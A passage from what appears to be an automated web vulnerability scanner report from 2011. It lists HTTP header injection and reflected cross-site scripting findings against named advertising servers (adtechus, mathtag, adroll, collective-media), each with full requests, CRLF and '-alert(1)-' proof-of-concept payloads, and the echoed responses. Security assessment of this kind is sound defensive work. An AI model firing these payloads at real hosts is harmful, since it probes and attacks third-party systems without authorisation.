The value of the adlink|3.0|5345|2221988|1|16|AdId request parameter is copied into the Location response header. The payload 39301%0d%0aa06bcb1f098 was submitted in the adlink|3.0|5345|2221988|1|16|AdId parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq371039301%0d%0aa06bcb1f098&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq371039301
a06bcb1f098
&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.4. http://adserver.adtechus.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the cid request parameter is copied into the Location response header. The payload d0a34%0d%0a5f234eb359e was submitted in the cid parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34%0d%0a5f234eb359e HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34
5f234eb359e

Content-Length: 0


2.5. http://adserver.adtechus.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e0895%0d%0abb178f9989d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895%0d%0abb178f9989d=1 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895
bb178f9989d
=1
Content-Length: 0


2.6. http://bidder.mathtag.com/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 487b6%0d%0a27da486a7cd was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=487b6%0d%0a27da486a7cd&id=5aW95q2jLzEvT1RNd05EUm1NREl0T0RJd05DMDBPRFJtTFdGaVkyRXRPRGd6WldZeFlUSXhOVEEyL05HVTJNbU5oWXpVdE16QTVNeTAxTnpnNUxUTXdNV0l0Tm1ZMFpUZG1ZbVl6T1RJeC8yMDgwOTA3OTE4ODY4NTUwMDQvMTM1NzExLzExMzEyNy81L09GYXNVUVR3TGRHYXdaSmsteWsxa3Nfb3llTlZTeXF3Mm9BeUlSMjU2cXcv/GEnH4X2n2EXLZwmAooR9I4CMTOY&price=AAABM1zpWOnT99xyFOkHR-fD82ZTrJ0Z-k7pYw HTTP/1.1
Host: bidder.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=2
Cookie: ts=1316277341; optout=1

Response

HTTP/1.1 404 Not found
Date: Tue, 01 Nov 2011 02:16:16 GMT
Server: MMBD/3.5.17.1
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 487b6
27da486a7cd

x-mm-host: pao-bidder-x1
Connection: keep-alive

Request not found

2.7. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a5eaf%0d%0a2b3fff9103d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/a5eaf%0d%0a2b3fff9103d/GGBU6EIY6FGOVO4H7YOUOC?pv=45097790706.43637&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 31 Oct 2011 19:40:46 GMT
Connection: keep-alive
Set-Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/a5eaf
2b3fff9103d
/GGBU6EIY6FGOVO4H7YOUOC/VEZ52JWCVBGCRMXILP25YR.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.8. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload fe03b%0d%0a0d2db46717e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/3LFYGW2GY5AUNBGJEFKFW7/fe03b%0d%0a0d2db46717e?pv=45097790706.43637&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 31 Oct 2011 19:40:53 GMT
Connection: keep-alive
Set-Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/3LFYGW2GY5AUNBGJEFKFW7/fe03b
0d2db46717e
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3. Cross-site scripting (reflected)  previous
There are 78 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8238c'-alert(1)-'538769bc1ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico8238c'-alert(1)-'538769bc1ed/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Tue, 01 Nov 2011 01:28:58 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:58 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico8238c'-alert(1)-'538769bc1ed/home_run_of;sz=728x90;net=q1;ord=4779871;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11e3'-alert(1)-'0e24c47d29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_ofb11e3'-alert(1)-'0e24c47d29;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Tue, 01 Nov 2011 01:28:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:59 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_ofb11e3'-alert(1)-'0e24c47d29;sz=728x90;net=q1;ord=4779871;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/q1.politico/home_run_of [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6dba'-alert(1)-'acda2ebf641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871?&b6dba'-alert(1)-'acda2ebf641=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Tue, 01 Nov 2011 01:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871?&b6dba'-alert(1)-'acda2ebf641=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/q1.politico/home_run_of [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b8'-alert(1)-'b862447dec9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871?1f1b8'-alert(1)-'b862447dec9 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Tue, 01 Nov 2011 01:28:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:56 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871?1f1b8'-alert(1)-'b862447dec9;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 870f0'-alert(1)-'681d43366b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj870f0'-alert(1)-'681d43366b4/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:58 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30211278520_1320110938","http://ad.doubleclick.net/adj870f0'-alert(1)-'681d43366b4/q1.politico/home_run_of;net=q1;u=,q1-30211278520_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.6. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 295a1'-alert(1)-'e04023ad0ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico295a1'-alert(1)-'e04023ad0ea/home_run_of;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:58 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30106793610_1320110938","http://ad.doubleclick.net/adj/q1.politico295a1'-alert(1)-'e04023ad0ea/home_run_of;net=q1;u=,q1-30106793610_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.7. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 407fd'-alert(1)-'75fed897780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico/home_run_of407fd'-alert(1)-'75fed897780;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:59 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30315246489_1320110939","http://ad.doubleclick.net/adj/q1.politico/home_run_of407fd'-alert(1)-'75fed897780;net=q1;u=,q1-30315246489_1320110939,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.8. http://a.collective-media.net/cmadj/q1.politico/home_run_of [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6ff'-alert(1)-'c85e9da208c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico/home_run_of;sz=fb6ff'-alert(1)-'c85e9da208c HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
